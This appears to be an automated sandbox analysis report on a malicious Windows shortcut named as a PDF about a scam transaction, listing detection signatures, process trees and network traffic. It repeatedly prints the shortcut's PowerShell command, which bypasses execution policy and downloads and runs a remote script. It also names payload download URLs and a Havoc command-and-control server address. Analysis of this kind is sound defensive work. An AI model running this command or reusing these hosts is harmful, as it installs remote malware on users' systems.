Windows Analysis Report
Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk

Overview

General Information

Sample name: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk
Analysis ID: 1578249
MD5: 1fdc0eb15af0f989e5cc7ab9fc8e14ec
SHA1: b15076953f50268ca6e5cc57f3279a3652da5311
SHA256: 623767715bd1a33c41e2de8ab3af341e629105132c3434f454cf249f98adbfd7
Tags: lnk, Scam, Transaction, 7350, user-JAMESWT_MHT

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Bypasses PowerShell execution policy
Machine Learning detection for sample
Powershell drops PE file
Sets debug register (to hijack the execution of another thread)
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cmd.exe (PID: 7676 cmdline: "C:\Windows\System32\cmd.exe" /c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7736 cmdline: powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Onedrive.exe (PID: 8020 cmdline: "C:\Users\user\AppData\Local\Temp\Onedrive.exe" MD5: 32C31F06E0B68F349F68AFDD08E45F3D)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: frack113 | Data: Command: powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", CommandLine: powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7676, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", ProcessId: 7736, ProcessName: powershell.exe
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: "C:\Windows\System32\cmd.exe" /c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", CommandLine: "C:\Windows\System32\cmd.exe" /c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", ProcessId: 7676, ProcessName: cmd.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", CommandLine: powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7676, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", ProcessId: 7736, ProcessName: powershell.exe
Timestamp                        SID      Severity  Classtype                                      Source IP    Source Port  Destination IP  Destination Port  Protocol
2024-12-19T13:35:19.388292+0100  2056539  1         Malware Command and Control Activity Detected  192.168.2.4  49735        47.84.196.148   443               TCP

Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP  Destination Port  Protocol
2024-12-19T13:35:09.604537+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49732        89.35.237.170   80                TCP
2024-12-19T13:35:11.835744+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49733        89.35.237.170   443               TCP
2024-12-19T13:35:12.823279+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49732        89.35.237.170   80                TCP
2024-12-19T13:35:15.071412+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49734        89.35.237.170   443               TCP


AV Detection

Source: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk | Virustotal: Detection: 14%
Source: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk | ReversingLabs: Detection: 13%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 89.35.237.170:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.4:49985 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.4:50014 version: TLS 1.2
Source: Binary string: C:\Users\dell\Downloads\tamperedsyscallshellcodeinfile\x64\Release\tampered.pdb | source: Onedrive.exe, 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp, sppc.dll.2.dr
Source: Binary string: phoneactivate.pdbGCTLG | source: powershell.exe, 00000002.00000002.1859298060.0000025EE8F2C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: phoneactivate.pdb | source: powershell.exe, 00000002.00000002.1859298060.0000025EE8F2C000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000000.1832954156.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp, Onedrive.exe, 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp, Onedrive.exe.2.dr
Source: Binary string: phoneactivate.pdbGCTL | source: Onedrive.exe, 00000004.00000000.1832954156.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp, Onedrive.exe, 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp, Onedrive.exe.2.dr
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FFDF3AF7470 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,4_2_00007FFDF3AF7470
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking

Source: Network traffic | Suricata IDS: 2056539 - Severity 1 - ET MALWARE Havoc Demon CnC Request : 192.168.2.4:49735 -> 47.84.196.148:443
Source: Joe Sandbox View | IP Address: 89.35.237.170
Source: Joe Sandbox View | ASN Name: TEENTELECOMRO
Source: Joe Sandbox View | ASN Name: VODANETInternationalIP-BackboneofVodafoneDE
Source: Joe Sandbox View | JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49732 -> 89.35.237.170:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 89.35.237.170:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 89.35.237.170:443
Source: global traffic | HTTP traffic detected: GET /g1.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: bangla.b-cdn.net | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /onedrive.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: bangla.b-cdn.net
Source: global traffic | HTTP traffic detected: GET /sppc.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: bangla.b-cdn.net
Source: global traffic | HTTP traffic detected: POST /reports HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: */* | User-Agent: Mozilla/5.0 | Content-Length: 279 | Host: 47.84.196.148
Source: global traffic | HTTP traffic detected: POST /reports HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: */* | User-Agent: Mozilla/5.0 | Content-Length: 20 | Host: 47.84.196.148
Source: unknown | TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: global traffic | DNS traffic detected: DNS query: bangla.b-cdn.net
Source: unknown | HTTP traffic detected: POST /reports HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: */* | User-Agent: Mozilla/5.0 | Content-Length: 279 | Host: 47.84.196.148
Source: powershell.exe, 00000002.00000002.1836408156.0000025E80C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E81A54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E81602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E816F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E815E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://bangla.b-cdn.net
Source: powershell.exe, 00000002.00000002.1836408156.0000025E80C32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://bangla.b-cdn.net/g1.ps1
Source: powershell.exe, 00000002.00000002.1836408156.0000025E816F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://bangla.b-cdn.net/onedrive.dll
Source: powershell.exe, 00000002.00000002.1836408156.0000025E81A54000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://bangla.b-cdn.net/sppc.dll
Source: powershell.exe, 00000002.00000002.1851578383.0000025E90075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1851578383.0000025E901B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1836408156.0000025E80232000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Onedrive.exe | String found in binary or memory: http://schemas.mic
Source: powershell.exe, 00000002.00000002.1836408156.0000025E80001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1836408156.0000025E80232000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1859298060.0000025EE8F2C000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2871361393.000001729C172000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2873861146.000001729C175000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2872607914.000001729C172000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2873770232.000001729C172000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: Onedrive.exe, 00000004.00000003.3900847973.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744954721.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3294391353.000001729C166000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2644040219.000001729C142000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2456893874.000001729C163000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744733944.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3293582423.000001729C162000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2142971553.000001729C164000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2643148332.000001729C166000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2465823286.000001729C124000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://47.84.196.148/
Source: Onedrive.exe, 00000004.00000003.3900847973.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744954721.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744733944.000001729C17A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://47.84.196.148/3Y
Source: Onedrive.exe, 00000004.00000003.3900847973.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744954721.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744733944.000001729C17A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://47.84.196.148/8
Source: Onedrive.exe, 00000004.00000002.4145437606.000001729C124000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://47.84.196.148/Z
Source: Onedrive.exe, 00000004.00000003.4047585231.000001729C153000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://47.84.196.148/reports
Source: Onedrive.exe, 00000004.00000003.3294581743.000001729C154000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3294309723.000001729C153000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://47.84.196.148/reports3
Source: Onedrive.exe, 00000004.00000003.3901060263.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3901159878.000001729C12E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://47.84.196.148/reportsC
Source: Onedrive.exe, 00000004.00000003.2873197147.000001729C154000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2871361393.000001729C152000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://47.84.196.148/reportsG
Source: Onedrive.exe, 00000004.00000003.3744954721.000001729C161000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000002.4145437606.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3294687341.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744733944.000001729C153000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2456893874.000001729C163000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3745161112.000001729C14A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2643148332.000001729C166000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3900915820.000001729C14A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3294813782.000001729C12E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://47.84.196.148/reportsr
Source: Onedrive.exe, 00000004.00000003.2872607914.000001729C167000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2872000136.000001729C167000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2873770232.000001729C167000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://47.84.196.148/xC
Source: Onedrive.exe, 00000004.00000003.3901060263.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3901159878.000001729C12E000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3901025461.000001729C0DC000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2873981465.000001729C0DC000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000002.4145437606.000001729C0A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://47.84.196.148:443/reports
Source: Onedrive.exe, 00000004.00000002.4145437606.000001729C124000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://47.84.196.148:443/reports-
Source: powershell.exe, 00000002.00000002.1836408156.0000025E80001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1836408156.0000025E81A54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E816F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E815E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bangla.b-cdn.net
Source: powershell.exe, 00000002.00000002.1836408156.0000025E815E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bangla.b-cdn.net/g1.ps1
Source: powershell.exe, 00000002.00000002.1836408156.0000025E816F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bangla.b-cdn.net/onedrive.dll
Source: powershell.exe, 00000002.00000002.1836408156.0000025E81602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E81A1A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bangla.b-cdn.net/sppc.dll
Source: powershell.exe, 00000002.00000002.1851578383.0000025E901B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1851578383.0000025E901B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1851578383.0000025E901B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1836408156.0000025E80232000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1836408156.0000025E80C32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1851578383.0000025E90075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1851578383.0000025E901B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown | Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown | Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734

System Summary

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Onedrive.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\sppc.dll
Source: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk | LNK file: /c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}"
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_3_000001729DD20020 NtAllocateVirtualMemory,NtProtectVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FFDF3AD1010 CreateFileA,GetFileSize,VirtualAlloc,ReadFile,CloseHandle,LoadLibraryW,GetProcAddress,VirtualFree,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,SleepEx,SleepEx,VirtualFree,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FFDF3AD1960 NtAccessCheck
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_3_000001729DD358AF
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_3_000001729DD20BDF
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_3_000001729DD2876F
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_3_000001729DD2A71A
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_3_000001729DD3764F
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_3_000001729DD2C13F
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FF63EA11384
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FF63EA157D0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FF63EA17010
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FF63EA1A33C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FF63EA18CE0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FF63EA1892C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FF63EA1E048
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FF63EA16454
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FF63EA1ACA4
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FF63EA1C214
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FF63EA1D98C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FF63EA17B1C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FF63EA15E74
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FF63EA18E4C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FFDF3AEB5A0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FFDF3AD1010
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FFDF3B023A0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FFDF3AEA310
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FFDF3AEC6DE
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FFDF3AD2B00
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FFDF3AEC980
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FFDF3AD1960
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FFDF3AEA8F0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FFDF3AEAD91
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FFDF3AEBDC0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: String function: 00007FFDF3AEDDC0 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: String function: 00007FFDF3AEEFC0 appears 198 times
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: String function: 00007FFDF3AEDE30 appears 85 times
Source: classification engine | Classification label: mal92.evad.winLNK@7/9@1/2
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FF63EA17B1C CoCreateInstance,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FF63EA1BF50 FindResourceExW,LoadResource,LockResource,GetLastError,GetLastError,GetLastError
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vemtfwyl.t02.ps1
Source: C:\Windows\System32\conhost.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
